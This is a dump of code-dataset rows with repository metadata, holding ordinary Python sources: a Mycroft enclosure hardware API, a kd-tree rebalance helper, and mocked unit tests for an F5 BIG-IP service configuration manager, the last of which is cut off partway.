hexsha
stringlengths 40
40
| size
int64 2
1.02M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 4
245
| max_stars_repo_name
stringlengths 6
130
| max_stars_repo_head_hexsha
stringlengths 40
40
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 4
245
| max_issues_repo_name
stringlengths 6
130
| max_issues_repo_head_hexsha
stringlengths 40
40
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 4
245
| max_forks_repo_name
stringlengths 6
130
| max_forks_repo_head_hexsha
stringlengths 40
40
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 2
1.02M
| avg_line_length
float64 1
417k
| max_line_length
int64 1
987k
| alphanum_fraction
float64 0
1
| content_no_comment
stringlengths 0
1.01M
| is_comment_constant_removed
bool 1
class | is_sharp_comment_removed
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1c40b043448434c4bb46287fef9905573f19eb92
| 13,765
|
py
|
Python
|
mycroft/enclosure/api.py
|
chrisveilleux/mycroft-core
|
32557365daf69d6a5a3cb6fcf3d748abe58b6261
|
[
"Apache-2.0"
] | 1
|
2020-09-03T22:33:42.000Z
|
2020-09-03T22:33:42.000Z
|
mycroft/enclosure/api.py
|
xeddmc/mycroft-core
|
d6cbccc0cbfbf6b540830aab4c15a32adf67b9bf
|
[
"Apache-2.0"
] | 2
|
2021-09-08T01:43:29.000Z
|
2022-01-13T02:20:19.000Z
|
mycroft/enclosure/api.py
|
felipehmsilveira/mycroft-ai
|
8b1997e9444d0d672eded29de63bee54c7933b08
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2017 Mycroft AI Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from .display_manager import DisplayManager
from mycroft.messagebus.message import Message
'''
API for the functions that affect the Mark I device.
NOTE: current state management is poorly implemented,
will be changed in the future.
'''
class EnclosureAPI:
"""
This API is intended to be used to interface with the hardware
that is running Mycroft. It exposes all possible commands which
can be sent to a Mycroft enclosure implementation.
Different enclosure implementations may implement this differently
and/or may ignore certain API calls completely. For example,
the eyes_color() API might be ignore on a Mycroft that uses simple
LEDs which only turn on/off, or not at all on an implementation
where there is no face at all.
"""
def __init__(self, bus, name=""):
self.bus = bus
self.name = name
self.display_manager = DisplayManager(self.name)
def register(self, skill_name=""):
"""Registers a skill as active. Used for speak() and speak_dialog()
to 'patch' a previous implementation. Somewhat hacky.
"""
if self.name != "":
self.display_manager.set_active(self.name)
else:
self.display_manager.set_active(skill_name)
def reset(self):
"""The enclosure should restore itself to a started state.
Typically this would be represented by the eyes being 'open'
and the mouth reset to its default (smile or blank).
"""
self.bus.emit(Message("enclosure.reset",
context={"destination": ["enclosure"]}))
def system_reset(self):
"""The enclosure hardware should reset any CPUs, etc."""
self.bus.emit(Message("enclosure.system.reset",
context={"destination": ["enclosure"]}))
def system_mute(self):
"""Mute (turn off) the system speaker."""
self.bus.emit(Message("enclosure.system.mute",
context={"destination": ["enclosure"]}))
def system_unmute(self):
"""Unmute (turn on) the system speaker."""
self.bus.emit(Message("enclosure.system.unmute",
context={"destination": ["enclosure"]}))
def system_blink(self, times):
"""The 'eyes' should blink the given number of times.
Args:
times (int): number of times to blink
"""
self.bus.emit(Message("enclosure.system.blink", {'times': times},
context={"destination": ["enclosure"]}))
def eyes_on(self):
"""Illuminate or show the eyes."""
self.bus.emit(Message("enclosure.eyes.on",
context={"destination": ["enclosure"]}))
def eyes_off(self):
"""Turn off or hide the eyes."""
self.bus.emit(Message("enclosure.eyes.off",
context={"destination": ["enclosure"]}))
def eyes_blink(self, side):
"""Make the eyes blink
Args:
side (str): 'r', 'l', or 'b' for 'right', 'left' or 'both'
"""
self.bus.emit(Message("enclosure.eyes.blink", {'side': side},
context={"destination": ["enclosure"]}))
def eyes_narrow(self):
"""Make the eyes look narrow, like a squint"""
self.bus.emit(Message("enclosure.eyes.narrow",
context={"destination": ["enclosure"]}))
def eyes_look(self, side):
"""Make the eyes look to the given side
Args:
side (str): 'r' for right
'l' for left
'u' for up
'd' for down
'c' for crossed
"""
self.bus.emit(Message("enclosure.eyes.look", {'side': side},
context={"destination": ["enclosure"]}))
def eyes_color(self, r=255, g=255, b=255):
"""Change the eye color to the given RGB color
Args:
r (int): 0-255, red value
g (int): 0-255, green value
b (int): 0-255, blue value
"""
self.bus.emit(Message("enclosure.eyes.color",
{'r': r, 'g': g, 'b': b},
context={"destination": ["enclosure"]}))
def eyes_setpixel(self, idx, r=255, g=255, b=255):
"""Set individual pixels of the Mark 1 neopixel eyes
Args:
idx (int): 0-11 for the right eye, 12-23 for the left
r (int): The red value to apply
g (int): The green value to apply
b (int): The blue value to apply
"""
if idx < 0 or idx > 23:
raise ValueError('idx ({}) must be between 0-23'.format(str(idx)))
self.bus.emit(Message("enclosure.eyes.setpixel",
{'idx': idx, 'r': r, 'g': g, 'b': b},
context={"destination": ["enclosure"]}))
def eyes_fill(self, percentage):
"""Use the eyes as a type of progress meter
Args:
percentage (int): 0-49 fills the right eye, 50-100 also covers left
"""
if percentage < 0 or percentage > 100:
raise ValueError('percentage ({}) must be between 0-100'.
format(str(percentage)))
self.bus.emit(Message("enclosure.eyes.fill",
{'percentage': percentage},
context={"destination": ["enclosure"]}))
def eyes_brightness(self, level=30):
"""Set the brightness of the eyes in the display.
Args:
level (int): 1-30, bigger numbers being brighter
"""
self.bus.emit(Message("enclosure.eyes.level", {'level': level},
context={"destination": ["enclosure"]}))
def eyes_reset(self):
"""Restore the eyes to their default (ready) state."""
self.bus.emit(Message("enclosure.eyes.reset",
context={"destination": ["enclosure"]}))
def eyes_spin(self):
"""Make the eyes 'roll'
"""
self.bus.emit(Message("enclosure.eyes.spin",
context={"destination": ["enclosure"]}))
def eyes_timed_spin(self, length):
"""Make the eyes 'roll' for the given time.
Args:
length (int): duration in milliseconds of roll, None = forever
"""
self.bus.emit(Message("enclosure.eyes.timedspin",
{'length': length}))
def eyes_volume(self, volume):
"""Indicate the volume using the eyes
Args:
volume (int): 0 to 11
"""
if volume < 0 or volume > 11:
raise ValueError('volume ({}) must be between 0-11'.
format(str(volume)))
self.bus.emit(Message("enclosure.eyes.volume", {'volume': volume},
context={"destination": ["enclosure"]}))
def mouth_reset(self):
"""Restore the mouth display to normal (blank)"""
self.bus.emit(Message("enclosure.mouth.reset",
context={"destination": ["enclosure"]}))
self.display_manager.set_active(self.name)
def mouth_talk(self):
"""Show a generic 'talking' animation for non-synched speech"""
self.bus.emit(Message("enclosure.mouth.talk",
context={"destination": ["enclosure"]}))
self.display_manager.set_active(self.name)
def mouth_think(self):
"""Show a 'thinking' image or animation"""
self.bus.emit(Message("enclosure.mouth.think",
context={"destination": ["enclosure"]}))
self.display_manager.set_active(self.name)
def mouth_listen(self):
"""Show a 'thinking' image or animation"""
self.bus.emit(Message("enclosure.mouth.listen",
context={"destination": ["enclosure"]}))
self.display_manager.set_active(self.name)
def mouth_smile(self):
"""Show a 'smile' image or animation"""
self.bus.emit(Message("enclosure.mouth.smile",
context={"destination": ["enclosure"]}))
self.display_manager.set_active(self.name)
def mouth_viseme(self, start, viseme_pairs):
""" Send mouth visemes as a list in a single message.
Arguments:
start (int): Timestamp for start of speech
viseme_pairs: Pairs of viseme id and cumulative end times
(code, end time)
codes:
0 = shape for sounds like 'y' or 'aa'
1 = shape for sounds like 'aw'
2 = shape for sounds like 'uh' or 'r'
3 = shape for sounds like 'th' or 'sh'
4 = neutral shape for no sound
5 = shape for sounds like 'f' or 'v'
6 = shape for sounds like 'oy' or 'ao'
"""
self.bus.emit(Message("enclosure.mouth.viseme_list",
{"start": start, "visemes": viseme_pairs},
context={"destination": ["enclosure"]}))
def mouth_text(self, text=""):
"""Display text (scrolling as needed)
Args:
text (str): text string to display
"""
self.display_manager.set_active(self.name)
self.bus.emit(Message("enclosure.mouth.text", {'text': text},
context={"destination": ["enclosure"]}))
def mouth_display(self, img_code="", x=0, y=0, refresh=True):
"""Display images on faceplate. Currently supports images up to 16x8,
or half the face. You can use the 'x' parameter to cover the other
half of the faceplate.
Args:
img_code (str): text string that encodes a black and white image
x (int): x offset for image
y (int): y offset for image
refresh (bool): specify whether to clear the faceplate before
displaying the new image or not.
Useful if you'd like to display multiple images
on the faceplate at once.
"""
self.display_manager.set_active(self.name)
self.bus.emit(Message('enclosure.mouth.display',
{'img_code': img_code,
'xOffset': x,
'yOffset': y,
'clearPrev': refresh},
context={"destination": ["enclosure"]}))
def mouth_display_png(self, image_absolute_path,
invert=False, x=0, y=0, refresh=True):
""" Send an image to the enclosure.
Args:
image_absolute_path (string): The absolute path of the image
invert (bool): inverts the image being drawn.
x (int): x offset for image
y (int): y offset for image
refresh (bool): specify whether to clear the faceplate before
displaying the new image or not.
Useful if you'd like to display muliple images
on the faceplate at once.
"""
self.display_manager.set_active(self.name)
self.bus.emit(Message("enclosure.mouth.display_image",
{'img_path': image_absolute_path,
'xOffset': x,
'yOffset': y,
'invert': invert,
'clearPrev': refresh},
context={"destination": ["enclosure"]}))
def weather_display(self, img_code, temp):
"""Show a the temperature and a weather icon
Args:
img_code (char): one of the following icon codes
0 = sunny
1 = partly cloudy
2 = cloudy
3 = light rain
4 = raining
5 = stormy
6 = snowing
7 = wind/mist
temp (int): the temperature (either C or F, not indicated)
"""
self.display_manager.set_active(self.name)
self.bus.emit(Message("enclosure.weather.display",
{'img_code': img_code, 'temp': temp},
context={"destination": ["enclosure"]}))
def activate_mouth_events(self):
"""Enable movement of the mouth with speech"""
self.bus.emit(Message('enclosure.mouth.events.activate',
context={"destination": ["enclosure"]}))
def deactivate_mouth_events(self):
"""Disable movement of the mouth with speech"""
self.bus.emit(Message('enclosure.mouth.events.deactivate',
context={"destination": ["enclosure"]}))
| 42.094801
| 79
| 0.532655
|
from .display_manager import DisplayManager
from mycroft.messagebus.message import Message
class EnclosureAPI:
def __init__(self, bus, name=""):
self.bus = bus
self.name = name
self.display_manager = DisplayManager(self.name)
def register(self, skill_name=""):
if self.name != "":
self.display_manager.set_active(self.name)
else:
self.display_manager.set_active(skill_name)
def reset(self):
self.bus.emit(Message("enclosure.reset",
context={"destination": ["enclosure"]}))
def system_reset(self):
self.bus.emit(Message("enclosure.system.reset",
context={"destination": ["enclosure"]}))
def system_mute(self):
self.bus.emit(Message("enclosure.system.mute",
context={"destination": ["enclosure"]}))
def system_unmute(self):
self.bus.emit(Message("enclosure.system.unmute",
context={"destination": ["enclosure"]}))
def system_blink(self, times):
self.bus.emit(Message("enclosure.system.blink", {'times': times},
context={"destination": ["enclosure"]}))
def eyes_on(self):
self.bus.emit(Message("enclosure.eyes.on",
context={"destination": ["enclosure"]}))
def eyes_off(self):
self.bus.emit(Message("enclosure.eyes.off",
context={"destination": ["enclosure"]}))
def eyes_blink(self, side):
self.bus.emit(Message("enclosure.eyes.blink", {'side': side},
context={"destination": ["enclosure"]}))
def eyes_narrow(self):
self.bus.emit(Message("enclosure.eyes.narrow",
context={"destination": ["enclosure"]}))
def eyes_look(self, side):
self.bus.emit(Message("enclosure.eyes.look", {'side': side},
context={"destination": ["enclosure"]}))
def eyes_color(self, r=255, g=255, b=255):
self.bus.emit(Message("enclosure.eyes.color",
{'r': r, 'g': g, 'b': b},
context={"destination": ["enclosure"]}))
def eyes_setpixel(self, idx, r=255, g=255, b=255):
if idx < 0 or idx > 23:
raise ValueError('idx ({}) must be between 0-23'.format(str(idx)))
self.bus.emit(Message("enclosure.eyes.setpixel",
{'idx': idx, 'r': r, 'g': g, 'b': b},
context={"destination": ["enclosure"]}))
def eyes_fill(self, percentage):
if percentage < 0 or percentage > 100:
raise ValueError('percentage ({}) must be between 0-100'.
format(str(percentage)))
self.bus.emit(Message("enclosure.eyes.fill",
{'percentage': percentage},
context={"destination": ["enclosure"]}))
def eyes_brightness(self, level=30):
self.bus.emit(Message("enclosure.eyes.level", {'level': level},
context={"destination": ["enclosure"]}))
def eyes_reset(self):
self.bus.emit(Message("enclosure.eyes.reset",
context={"destination": ["enclosure"]}))
def eyes_spin(self):
self.bus.emit(Message("enclosure.eyes.spin",
context={"destination": ["enclosure"]}))
def eyes_timed_spin(self, length):
self.bus.emit(Message("enclosure.eyes.timedspin",
{'length': length}))
def eyes_volume(self, volume):
if volume < 0 or volume > 11:
raise ValueError('volume ({}) must be between 0-11'.
format(str(volume)))
self.bus.emit(Message("enclosure.eyes.volume", {'volume': volume},
context={"destination": ["enclosure"]}))
def mouth_reset(self):
self.bus.emit(Message("enclosure.mouth.reset",
context={"destination": ["enclosure"]}))
self.display_manager.set_active(self.name)
def mouth_talk(self):
self.bus.emit(Message("enclosure.mouth.talk",
context={"destination": ["enclosure"]}))
self.display_manager.set_active(self.name)
def mouth_think(self):
self.bus.emit(Message("enclosure.mouth.think",
context={"destination": ["enclosure"]}))
self.display_manager.set_active(self.name)
def mouth_listen(self):
self.bus.emit(Message("enclosure.mouth.listen",
context={"destination": ["enclosure"]}))
self.display_manager.set_active(self.name)
def mouth_smile(self):
self.bus.emit(Message("enclosure.mouth.smile",
context={"destination": ["enclosure"]}))
self.display_manager.set_active(self.name)
def mouth_viseme(self, start, viseme_pairs):
self.bus.emit(Message("enclosure.mouth.viseme_list",
{"start": start, "visemes": viseme_pairs},
context={"destination": ["enclosure"]}))
def mouth_text(self, text=""):
self.display_manager.set_active(self.name)
self.bus.emit(Message("enclosure.mouth.text", {'text': text},
context={"destination": ["enclosure"]}))
def mouth_display(self, img_code="", x=0, y=0, refresh=True):
self.display_manager.set_active(self.name)
self.bus.emit(Message('enclosure.mouth.display',
{'img_code': img_code,
'xOffset': x,
'yOffset': y,
'clearPrev': refresh},
context={"destination": ["enclosure"]}))
def mouth_display_png(self, image_absolute_path,
invert=False, x=0, y=0, refresh=True):
self.display_manager.set_active(self.name)
self.bus.emit(Message("enclosure.mouth.display_image",
{'img_path': image_absolute_path,
'xOffset': x,
'yOffset': y,
'invert': invert,
'clearPrev': refresh},
context={"destination": ["enclosure"]}))
def weather_display(self, img_code, temp):
self.display_manager.set_active(self.name)
self.bus.emit(Message("enclosure.weather.display",
{'img_code': img_code, 'temp': temp},
context={"destination": ["enclosure"]}))
def activate_mouth_events(self):
self.bus.emit(Message('enclosure.mouth.events.activate',
context={"destination": ["enclosure"]}))
def deactivate_mouth_events(self):
self.bus.emit(Message('enclosure.mouth.events.deactivate',
context={"destination": ["enclosure"]}))
| true
| true
|
1c40b10981b4e2f7eb853180abe5bc8bdf77cde1
| 416
|
py
|
Python
|
Project Πολυδιάστατες Δομές Δεδομένων/KD_Tree/rebalance.py
|
DimosthenisMich/UndergraduateCeidProjects
|
9f99f2c44e41d06020f3a5e9aacc0cd4357ee833
|
[
"MIT"
] | 6
|
2021-02-10T18:31:22.000Z
|
2022-03-03T17:49:30.000Z
|
Project Πολυδιάστατες Δομές Δεδομένων/KD_Tree/rebalance.py
|
DimosthenisMich/UndergraduateCeidProjects
|
9f99f2c44e41d06020f3a5e9aacc0cd4357ee833
|
[
"MIT"
] | 1
|
2020-09-30T19:16:39.000Z
|
2020-09-30T19:16:39.000Z
|
Project Πολυδιάστατες Δομές Δεδομένων/KD_Tree/rebalance.py
|
DimitrisKostorrizos/UndergraduateCeidProjects
|
9f99f2c44e41d06020f3a5e9aacc0cd4357ee833
|
[
"MIT"
] | 5
|
2021-11-24T21:34:15.000Z
|
2022-01-23T22:37:35.000Z
|
import medianBuild
rebuildPoints = []
dimensions = 2
def gatherTreeNodes(node):
if node is None:
return False
rebuildPoints.append(node.node)
return gatherTreeNodes(node.leftChild), gatherTreeNodes(node.rightChild)
def balanceKdTree(node):
gatherTreeNodes(node) # Gather all the nodes of the tree
root = medianBuild.kdTreeBuild(rebuildPoints, 0) # Rebuild the tree
return root
| 23.111111
| 76
| 0.733173
|
import medianBuild
rebuildPoints = []
dimensions = 2
def gatherTreeNodes(node):
if node is None:
return False
rebuildPoints.append(node.node)
return gatherTreeNodes(node.leftChild), gatherTreeNodes(node.rightChild)
def balanceKdTree(node):
gatherTreeNodes(node)
root = medianBuild.kdTreeBuild(rebuildPoints, 0)
return root
| true
| true
|
1c40b10c25701cd181b5ae1f090d71667f6b3c12
| 9,289
|
py
|
Python
|
f5_cccl/service/test/test_service_manager.py
|
f5yacobucci/f5-cccl
|
64e7fa0a6d4ead9b5209b5b46bf4ed1b6cef036a
|
[
"Apache-2.0"
] | null | null | null |
f5_cccl/service/test/test_service_manager.py
|
f5yacobucci/f5-cccl
|
64e7fa0a6d4ead9b5209b5b46bf4ed1b6cef036a
|
[
"Apache-2.0"
] | null | null | null |
f5_cccl/service/test/test_service_manager.py
|
f5yacobucci/f5-cccl
|
64e7fa0a6d4ead9b5209b5b46bf4ed1b6cef036a
|
[
"Apache-2.0"
] | 1
|
2019-11-02T05:22:48.000Z
|
2019-11-02T05:22:48.000Z
|
#!/usr/bin/env python
# Copyright 2017 F5 Networks Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import json
import pickle
import pytest
from f5_cccl.test.conftest import bigip_proxy
from f5_cccl.resource.ltm.app_service import ApplicationService
from f5_cccl.resource.ltm.virtual import VirtualServer
from f5_cccl.resource.ltm.pool import Pool
from f5_cccl.resource.ltm.monitor.http_monitor import HTTPMonitor
from f5_cccl.resource.ltm.policy.policy import Policy
from f5_cccl.resource.ltm.internal_data_group import InternalDataGroup
from f5_cccl.resource.ltm.irule import IRule
from f5_cccl.service.manager import ServiceConfigDeployer
from f5_cccl.service.manager import ServiceManager
from f5_cccl.service.config_reader import ServiceConfigReader
from mock import MagicMock
from mock import Mock
from mock import patch
@pytest.fixture
def service_manager():
partition = "test"
schema = 'f5_cccl/schemas/cccl-api-schema.yml'
service_mgr = ServiceManager(
bigip_proxy(),
partition,
schema)
return service_mgr
def test_apply_config(service_manager):
services = {}
assert service_manager.apply_config(services) == 0
class TestServiceConfigDeployer:
def setup(self):
self.bigip = bigip_proxy()
self.partition = "test"
svcfile = 'f5_cccl/schemas/tests/service.json'
with open(svcfile, 'r') as fp:
self.service = json.loads(fp.read())
config_reader = ServiceConfigReader(self.partition)
self.desired_config = config_reader.read_config(self.service)
def get_objects(self, objs, obj_type):
"""Extract objects of obj_type from the list."""
objs = [obj for obj in objs if isinstance(obj, obj_type)]
return objs
def get_created_objects(self, service_manager, obj_type):
"""Return list of created objects."""
deployer = service_manager._service_deployer
deployer._create_resources = Mock(return_value=[])
service_manager.apply_config(self.service)
assert deployer._create_resources.called
args, kwargs = deployer._create_resources.call_args_list[0]
return self.get_objects(args[0], obj_type)
def get_updated_objects(self, service_manager, obj_type):
"""Return list of updated objects."""
deployer = service_manager._service_deployer
deployer._update_resources = Mock(return_value=[])
service_manager.apply_config(self.service)
assert deployer._update_resources.called
args, kwargs = deployer._update_resources.call_args_list[0]
return self.get_objects(args[0], obj_type)
def get_deleted_objects(self, service_manager, obj_type):
"""Return list of deleted objects."""
deployer = service_manager._service_deployer
deployer._delete_resources = Mock(return_value=[])
service_manager.apply_config(self.service)
assert deployer._delete_resources.called
args, kwargs = deployer._delete_resources.call_args_list[0]
return self.get_objects(args[0], obj_type)
def test_create_deployer(self):
deployer = ServiceConfigDeployer(
self.bigip)
assert deployer
def test_deploy(self):
deployer = ServiceConfigDeployer(
self.bigip)
tasks_remaining = deployer.deploy(self.desired_config)
assert 0 == tasks_remaining
def test_app_services(self, service_manager):
"""Test create/update/delete of app services."""
# Should create one app service
objs = self.get_created_objects(service_manager, ApplicationService)
assert 1 == len(objs)
assert objs[0].name == 'MyAppService0'
# Should update one app service
self.service['iapps'][0]['name'] = 'MyAppService'
objs = self.get_updated_objects(service_manager, ApplicationService)
assert 1 == len(objs)
assert objs[0].name == 'MyAppService'
# Should delete two app services
self.service['iapps'] = []
objs = self.get_deleted_objects(service_manager, ApplicationService)
assert 2 == len(objs)
expected_set = set(['appsvc', 'MyAppService'])
result_set = set([objs[0].name, objs[1].name])
assert expected_set == result_set
def test_virtual_servers(self, service_manager):
"""Test create/update/delete of Virtual Servers."""
# Should create one Virtual Server
objs = self.get_created_objects(service_manager, VirtualServer)
assert 1 == len(objs)
assert objs[0].name == 'vs1'
# Should update one Virtual Server
self.service['virtualServers'][0]['name'] = 'virtual2'
objs = self.get_updated_objects(service_manager, VirtualServer)
assert 1 == len(objs)
assert objs[0].name == 'virtual2'
# Should delete one Virtual Server
self.service['virtualServers'] = []
objs = self.get_deleted_objects(service_manager, VirtualServer)
assert 1 == len(objs)
assert 'virtual2' == objs[0].name
def test_pools(self, service_manager):
"""Test create/update/delete of Pools."""
# Should create one Pool
objs = self.get_created_objects(service_manager, Pool)
assert 1 == len(objs)
assert objs[0].name == 'pool2'
# Should update one Pool
self.service['pools'][0]['name'] = 'pool1'
objs = self.get_updated_objects(service_manager, Pool)
assert 1 == len(objs)
assert objs[0].name == 'pool1'
# Should delete one Pool
self.service['pools'] = []
objs = self.get_deleted_objects(service_manager, Pool)
assert 1 == len(objs)
assert 'pool1' == objs[0].name
def test_monitors(self, service_manager):
"""Test create/update/delete of Health Monitors."""
# Should create one Monitor
objs = self.get_created_objects(service_manager, HTTPMonitor)
assert 1 == len(objs)
assert objs[0].name == 'myhttp'
# Should update one Monitor
self.service['monitors'][0]['name'] = 'mon_http'
objs = self.get_updated_objects(service_manager, HTTPMonitor)
assert 1 == len(objs)
assert objs[0].name == 'mon_http'
# Should delete one Monitor
self.service['monitors'] = []
objs = self.get_deleted_objects(service_manager, HTTPMonitor)
assert 1 == len(objs)
assert 'mon_http' == objs[0].name
def test_policies(self, service_manager):
"""Test create/update/delete of L7 Policies."""
# Should create one Policy
objs = self.get_created_objects(service_manager, Policy)
assert 1 == len(objs)
assert objs[0].name == 'test_wrapper_policy'
# Should update one Policy
self.service['l7Policies'][0]['name'] = 'wrapper_policy'
objs = self.get_updated_objects(service_manager, Policy)
assert 1 == len(objs)
assert objs[0].name == 'wrapper_policy'
# Should delete one Policy
self.service['l7Policies'] = []
objs = self.get_deleted_objects(service_manager, Policy)
assert 1 == len(objs)
assert 'wrapper_policy' == objs[0].name
def test_internal_data_groups(self, service_manager):
"""Test create/update/delete of Internal Data Groups."""
# Should create one Data Group
objs = self.get_created_objects(service_manager, InternalDataGroup)
assert 1 == len(objs)
assert objs[0].name == 'test-dgs'
# Should update one Data Group
self.service['internalDataGroups'][0]['name'] = 'test-dg'
objs = self.get_updated_objects(service_manager, InternalDataGroup)
assert 1 == len(objs)
assert objs[0].name == 'test-dg'
# Should delete one Data Group
self.service['internalDataGroups'] = []
objs = self.get_deleted_objects(service_manager, InternalDataGroup)
assert 1 == len(objs)
assert 'test-dg' == objs[0].name
def test_irules(self, service_manager):
"""Test create/update/delete of iRules."""
# Should create one iRule
objs = self.get_created_objects(service_manager, IRule)
assert 1 == len(objs)
assert objs[0].name == 'https_redirect'
# Should update one iRule
self.service['iRules'][0]['name'] = 'https_redirector'
objs = self.get_updated_objects(service_manager, IRule)
assert 1 == len(objs)
assert objs[0].name == 'https_redirector'
# Should delete one iRule
self.service['iRules'] = []
objs = self.get_deleted_objects(service_manager, IRule)
assert 1 == len(objs)
assert 'https_redirector' == objs[0].name
| 37.156
| 76
| 0.668533
|
import json
import pickle
import pytest
from f5_cccl.test.conftest import bigip_proxy
from f5_cccl.resource.ltm.app_service import ApplicationService
from f5_cccl.resource.ltm.virtual import VirtualServer
from f5_cccl.resource.ltm.pool import Pool
from f5_cccl.resource.ltm.monitor.http_monitor import HTTPMonitor
from f5_cccl.resource.ltm.policy.policy import Policy
from f5_cccl.resource.ltm.internal_data_group import InternalDataGroup
from f5_cccl.resource.ltm.irule import IRule
from f5_cccl.service.manager import ServiceConfigDeployer
from f5_cccl.service.manager import ServiceManager
from f5_cccl.service.config_reader import ServiceConfigReader
from mock import MagicMock
from mock import Mock
from mock import patch
@pytest.fixture
def service_manager():
partition = "test"
schema = 'f5_cccl/schemas/cccl-api-schema.yml'
service_mgr = ServiceManager(
bigip_proxy(),
partition,
schema)
return service_mgr
def test_apply_config(service_manager):
services = {}
assert service_manager.apply_config(services) == 0
class TestServiceConfigDeployer:
def setup(self):
self.bigip = bigip_proxy()
self.partition = "test"
svcfile = 'f5_cccl/schemas/tests/service.json'
with open(svcfile, 'r') as fp:
self.service = json.loads(fp.read())
config_reader = ServiceConfigReader(self.partition)
self.desired_config = config_reader.read_config(self.service)
def get_objects(self, objs, obj_type):
objs = [obj for obj in objs if isinstance(obj, obj_type)]
return objs
def get_created_objects(self, service_manager, obj_type):
deployer = service_manager._service_deployer
deployer._create_resources = Mock(return_value=[])
service_manager.apply_config(self.service)
assert deployer._create_resources.called
args, kwargs = deployer._create_resources.call_args_list[0]
return self.get_objects(args[0], obj_type)
def get_updated_objects(self, service_manager, obj_type):
deployer = service_manager._service_deployer
deployer._update_resources = Mock(return_value=[])
service_manager.apply_config(self.service)
assert deployer._update_resources.called
args, kwargs = deployer._update_resources.call_args_list[0]
return self.get_objects(args[0], obj_type)
def get_deleted_objects(self, service_manager, obj_type):
deployer = service_manager._service_deployer
deployer._delete_resources = Mock(return_value=[])
service_manager.apply_config(self.service)
assert deployer._delete_resources.called
args, kwargs = deployer._delete_resources.call_args_list[0]
return self.get_objects(args[0], obj_type)
def test_create_deployer(self):
deployer = ServiceConfigDeployer(
self.bigip)
assert deployer
def test_deploy(self):
deployer = ServiceConfigDeployer(
self.bigip)
tasks_remaining = deployer.deploy(self.desired_config)
assert 0 == tasks_remaining
def test_app_services(self, service_manager):
objs = self.get_created_objects(service_manager, ApplicationService)
assert 1 == len(objs)
assert objs[0].name == 'MyAppService0'
self.service['iapps'][0]['name'] = 'MyAppService'
objs = self.get_updated_objects(service_manager, ApplicationService)
assert 1 == len(objs)
assert objs[0].name == 'MyAppService'
self.service['iapps'] = []
objs = self.get_deleted_objects(service_manager, ApplicationService)
assert 2 == len(objs)
expected_set = set(['appsvc', 'MyAppService'])
result_set = set([objs[0].name, objs[1].name])
assert expected_set == result_set
def test_virtual_servers(self, service_manager):
objs = self.get_created_objects(service_manager, VirtualServer)
assert 1 == len(objs)
assert objs[0].name == 'vs1'
self.service['virtualServers'][0]['name'] = 'virtual2'
objs = self.get_updated_objects(service_manager, VirtualServer)
assert 1 == len(objs)
assert objs[0].name == 'virtual2'
self.service['virtualServers'] = []
objs = self.get_deleted_objects(service_manager, VirtualServer)
assert 1 == len(objs)
assert 'virtual2' == objs[0].name
def test_pools(self, service_manager):
objs = self.get_created_objects(service_manager, Pool)
assert 1 == len(objs)
assert objs[0].name == 'pool2'
self.service['pools'][0]['name'] = 'pool1'
objs = self.get_updated_objects(service_manager, Pool)
assert 1 == len(objs)
assert objs[0].name == 'pool1'
self.service['pools'] = []
objs = self.get_deleted_objects(service_manager, Pool)
assert 1 == len(objs)
assert 'pool1' == objs[0].name
def test_monitors(self, service_manager):
objs = self.get_created_objects(service_manager, HTTPMonitor)
assert 1 == len(objs)
assert objs[0].name == 'myhttp'
self.service['monitors'][0]['name'] = 'mon_http'
objs = self.get_updated_objects(service_manager, HTTPMonitor)
assert 1 == len(objs)
assert objs[0].name == 'mon_http'
self.service['monitors'] = []
objs = self.get_deleted_objects(service_manager, HTTPMonitor)
assert 1 == len(objs)
assert 'mon_http' == objs[0].name
def test_policies(self, service_manager):
objs = self.get_created_objects(service_manager, Policy)
assert 1 == len(objs)
assert objs[0].name == 'test_wrapper_policy'
self.service['l7Policies'][0]['name'] = 'wrapper_policy'
objs = self.get_updated_objects(service_manager, Policy)
assert 1 == len(objs)
assert objs[0].name == 'wrapper_policy'
self.service['l7Policies'] = []
objs = self.get_deleted_objects(service_manager, Policy)
assert 1 == len(objs)
assert 'wrapper_policy' == objs[0].name
def test_internal_data_groups(self, service_manager):
objs = self.get_created_objects(service_manager, InternalDataGroup)
assert 1 == len(objs)
assert objs[0].name == 'test-dgs'
self.service['internalDataGroups'][0]['name'] = 'test-dg'
objs = self.get_updated_objects(service_manager, InternalDataGroup)
assert 1 == len(objs)
assert objs[0].name == 'test-dg'
self.service['internalDataGroups'] = []
objs = self.get_deleted_objects(service_manager, InternalDataGroup)
assert 1 == len(objs)
assert 'test-dg' == objs[0].name
def test_irules(self, service_manager):
objs = self.get_created_objects(service_manager, IRule)
assert 1 == len(objs)
assert objs[0].name == 'https_redirect'
self.service['iRules'][0]['name'] = 'https_redirector'
objs = self.get_updated_objects(service_manager, IRule)
assert 1 == len(objs)
assert objs[0].name == 'https_redirector'
self.service['iRules'] = []
